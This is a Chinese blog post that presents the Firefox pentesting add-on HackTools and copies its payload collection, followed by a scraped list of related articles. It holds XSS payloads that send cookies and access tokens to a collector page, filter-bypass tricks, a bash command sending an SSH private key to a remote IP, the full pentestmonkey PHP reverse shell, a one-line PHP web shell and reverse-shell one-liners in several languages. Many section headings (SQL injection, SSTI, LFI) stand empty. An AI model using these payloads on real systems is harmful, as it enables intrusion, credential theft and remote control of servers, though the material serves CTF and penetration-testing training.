PJzhang:Firefox渗透测试插件HackTools样例
猫宁~~~
firefox插件hacktools地址:
https://addons.mozilla.org/zh-CN/firefox/addon/hacktools/
HackTools由Ludovic Coulon和Riadh BoUCHAHOUA创建。
这是他们插件制作的初衷:
我们是两个对计算机安全非常感兴趣的学生,这个想法是在我们的CTF培训期间出现的,我们注意到我们经常使用相同的工具(绘制一个shell,用php反向shell,Base64编码等等),这就是当我们想到将大多数工具和有效负载组合在一个地方的想法时,一个简单的Web应用程序就可以完成这项工作,但是来回移动相当令人沮丧,这就是为什么我们想直接在浏览器中实现一个扩展
由此,我们可以知道,一个渗透测试工具的目的,是提高生产力,有的时候,一种聚合也是一种创新。
1~xss相关payload
Data grabber for XSS
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
XSS in HTML/Applications
Basic Payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
Img tag payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
XSS in Markdown
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
XSS in SVG (short)
<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
Bypass word blacklist with code evaluation
eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;
2~sql注入payload
Generic SQL Injection Payloads
Time-Based
Generic Error Based Payloads
Authentication Based Payloads
Order by and UNION Based Payloads
3~Template Injections (SSTI),模板注入
Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
Jinja2 ( Flask / Django )
File reading
Write into a file
4~LFI,本地文件包含
Directory traversal
PHP Wrapper php://file
PHP Wrapper php://filter
Useful LFI files
Linux
Apache
MySQL
Windows
Bash Upload
# Upload file over HTTP (require HTTP service running on the attacker machine)
# Exfiltrate file over TCP# Listen with Netcat on port 1337 + output redirection
bash -c 'cat id_rsa > /dev/tcp/10.10.164.167/1337'
Bash Download
# Send via netcat
# Download file on the other machine
Netcat
# Upload payload
# Download
Python
# Python3 HTTP Server
# Python2 HTTP Server
SCP
# Upload from local host to remote computer
# Download from remote computer
SUID Commands
What version of the system ?
What is its kernel version ?
What is the environment variables ?
Service settings, there is any wrong allocation?
Is there any cron jobs ?
Other users host communication with the system ?
How to port forwarding ?
TAR wildcard cronjob privilege escalation
Python spawn shell
Fully Interactive TTY
All the steps to stabilize your shell
OS system spawn shell
Bash spawn shell
Perl spawn shell
Python spawn shell
Lua spawn shell
IRB spawn shell
VI spawn shell
VI(2) spawn shell
Nmap spawn shell
8~PHP Reverse Shell
Pentestmonkey's reverse shell
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // You have changed this
$port = ; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0; //
// Daemonise ourself if possible to avoid zombies later
// // pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork(); if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
} if ($pid) {
exit(0); // Parent exits
} // Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
} $daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
} // Change to a safe directory
chdir("/"); // Remove any umask we inherited
umask(0); //
// Do the reverse shell...
// // Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
} // Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
} // Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
} // Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
} // Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
} // If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
} // If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
} fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process); // Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
} ?>
Basic RCE
Obfuscate PHP Web Shell
Usage : http://target.com/path/to/shell.php?0=command
<?=`$_POST[0]`?>
9~Reverse shell
A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host.
bash -c 'exec bash -i &>/dev/tcp/192.168.100.100/100 <&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.100 100 >/tmp/f
php -r '$sock=fsockopen(getenv("192.168.100.100"),getenv("100"));exec("/bin/sh -i <&3 >&3 2>&3");'
perl -e 'use Socket;$i="$ENV{192.168.100.100}";$p=$ENV{100};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("192.168.100.100"),int(os.getenv("100")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["192.168.100.100"],ENV["100"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
TF=$(mktemp -u); mkfifo $TF && telnet 192.168.100.100 100 0<$TF | /bin/sh 1>$TF
over~~~
PJzhang:Firefox渗透测试插件HackTools样例的更多相关文章
- 34款Firefox渗透测试插件工具
工欲善必先利其器,firefox一直是各位渗透师必备的利器,小编这里推荐34款firefox渗透测试辅助插件,其中包含渗透测试.信息收集.代理.加密解密等功能. 1:Firebug Firefox的 ...
- 34款Firefox渗透测试插件
1:Firebug Firefox的 五星级强力推荐插件之一,不许要多解释 2:User Agent Switcher 改变客户端的User Agent的一款插件 3:Hackbar 攻城师必备工具, ...
- Firefox渗透测试黑客插件集
前天看S哥用Firefox的hackbar进行手动注入进行渗透,觉得直接运用浏览器的插件进行渗透测试有很多优点,既可以直接在前端进行注入等操作,也可以省却了寻找各种工具的麻烦.前端还是最直接的!于是这 ...
- C++的性能C#的产能?! - .Net Native 系列《三》:.NET Native部署测试方案及样例
之前一文<c++的性能, c#的产能?!鱼和熊掌可以兼得,.NET NATIVE初窥> 获得很多朋友支持和鼓励,也更让我坚定做这项技术的推广者,希望能让更多的朋友了解这项技术,于是先从官方 ...
- PJzhang:漏洞渗透测试框架“天使之剑(AngelSword)”
猫宁!!! 参考链接: www.phpinfo.cc/?post=42 https://www.freebuf.com/sectool/149883.html 同事介绍了一款渗透测试框架AngelSw ...
- docker搭建一个渗透测试环境 bwapp为例
bwapp是一个渗透测试靶场,他其中中含有100多个Web漏洞 基本涵盖了所有主要的已知Web漏洞,包括OWASP Top 10的各种 首先要去搜索一下 看一下有哪些镜像可以下载 docke ...
- 18个扩展让你的Firefox成为渗透测试工具
Firefox是一个出自Mozilla组织的流行的web浏览器.Firefox的流行并不仅仅是因为它是一个好的浏览器,而是因为它能够支持插件进而加强它自身的功能.Mozilla有一个插件站点,在那里面 ...
- Grunt经常使用插件及演示样例说明
下述给出了经常使用Grunt插件,并列举了部分插件演示样例: 插件名称 说明 Github地址 grunt-contrib-clean 清空文件和目录 https://github.com/grunt ...
- firefox渗透师必备的利器
工欲善必先利其器,firefox一直是各位渗透师必备的利器,小编这里推荐34款firefox渗透测试辅助插件,其中包含渗透测试.信息收集.代理.加密解密等功能. 1:Firebug Firefox的 ...
随机推荐
- Redis之命令详解
Redis命令手册:http://doc.redisfans.com/
- Kafka 【入门一篇文章就够了】
初识 Kafka 什么是 kafka Kafka 是由 Linkedin 公司开发的,它是一个分布式的,支持多分区.多副本,基于 Zookeeper 的分布式消息流平台,它同时也是一款开源的基于发布订 ...
- JVM关于GC的日志分析
通过阅读GC日志,我们可以了解Java虛拟机内存分配与回收策略.内存分配与垃圾回收的参数列表 一XX: +PrintGC 输出Gc日志.类似: 一verbose:gc 一XX: +PrintGCDet ...
- 云计算openstack核心组件——glance— 镜像服务(6)
一.glance介绍: Glance是Openstack项目中负责镜像管理的模块,其功能包括虚拟机镜像的查找.注册和检索等. Glance提供Restful API可以查询虚 ...
- three.js学习4_光源
Three.Light 首先展示的是使用半球光引用的效果, 光源直接放置于场景之上,光照颜色从天空光线颜色颜色渐变到地面光线颜色.光照主要有 AmbientLight 环境光 DirectionalL ...
- Jaskson精讲第7篇-类继承关系下的JSON序列化与反序列化JsonTypeInfo
Jackson是Spring Boot(SpringBoot)默认的JSON数据处理框架,但是其并不依赖于任何的Spring 库.有的小伙伴以为Jackson只能在Spring框架内使用,其实不是的, ...
- Next轻量级框架与主流工具的整合
前言 老大说以后会用 next 来做一下 SSR 的项目,让我们有空先学学.又从 0 开始学习新的东西了,想着还是记录一下学习历程,有输入就要有输出吧,免得以后给忘记学了些什么~ Next框架与主流工 ...
- python_用户登录验证
登录验证,三次机会,如何做? 1. 一个用户列表记录合法密码和用户名,一个小黑屋列表记录输错3次的用户, 一个中间列表记录所有用户输入,统计某个用户是否输错3次 2. 通过 in 判断一个元素是否在一 ...
- 安卓app功能或自动化测试覆盖率统计(不用instrumentation启动app)
一文带你揭秘如何采取非instrumentation启动app,打造实时统计覆盖率,一键触发覆盖率测试报告. 在上篇文章,一文带你解决Android app手工测试或者自动化测试覆盖率统计(撸代码版) ...
- Dell XPS 7590 Hackintosh
网上主流引导Hackintosh的工具有Chameleon, Clover和OpenCore. 但是随着Hackintosh重要驱动开发团队acidanthera逐渐转向OpenCore,后者显然才是 ...